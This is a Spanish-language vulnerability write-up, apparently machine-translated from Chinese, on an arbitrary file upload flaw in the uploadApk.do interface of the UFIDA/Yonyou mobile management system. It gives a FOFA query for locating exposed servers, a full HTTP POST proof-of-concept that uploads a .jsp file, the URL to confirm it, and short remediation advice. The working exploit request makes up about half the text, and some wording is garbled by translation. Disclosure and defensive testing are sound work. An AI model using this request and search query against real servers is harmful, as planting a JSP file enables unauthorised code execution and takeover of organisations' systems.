0x01 Introducción del producto
La gestión del sistema móvil UFIDA es una solución de oficina móvil lanzada por UFIDA, que tiene como objetivo ayudar a las empresas a realizar oficinas móviles, mejorar la eficiencia de la gestión y la flexibilidad laboral del personal. Proporciona una serie de funciones y herramientas para facilitar a los usuarios la gestión y el procesamiento de sistemas empresariales y negocios en dispositivos móviles.
Descripción general de la vulnerabilidad 0x02
Existe una vulnerabilidad de carga de archivos arbitrarios en la interfaz uploadApk.do del sistema de gestión móvil UFIDA. Los atacantes no autorizados pueden cargar archivos arbitrarios a través de la vulnerabilidad y, finalmente, obtener acceso al servidor.
0x03 Entorno de recurrencia
FOFA: app="Gestión del sistema Yonyou-Mobile"
0x04 Reaparición de vulnerabilidad
PoC
POST /maportal/appmanager/uploadApk.do?pk_obj= HTTP/1.1
Host: your-ip
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryvLTG6zlX0gZ8LzO3
------WebKitFormBoundaryvLTG6zlX0gZ8LzO3
Content-Disposition: form-data; name="downloadpath"; filename="a.jsp"
Content-Type: application/msword
hello
------WebKitFormBoundaryvLTG6zlX0gZ8LzO3--
PD: el código de estado de retorno debe ser 2, no se aceptan otros códigos de estado
verificar URL
http://your-ip/maupload/apk/a.jsp
0x05 Sugerencia de reparación
Cierre la superficie expuesta a Internet o establezca el permiso de acceso a la interfaz
Actualizar a una versión segura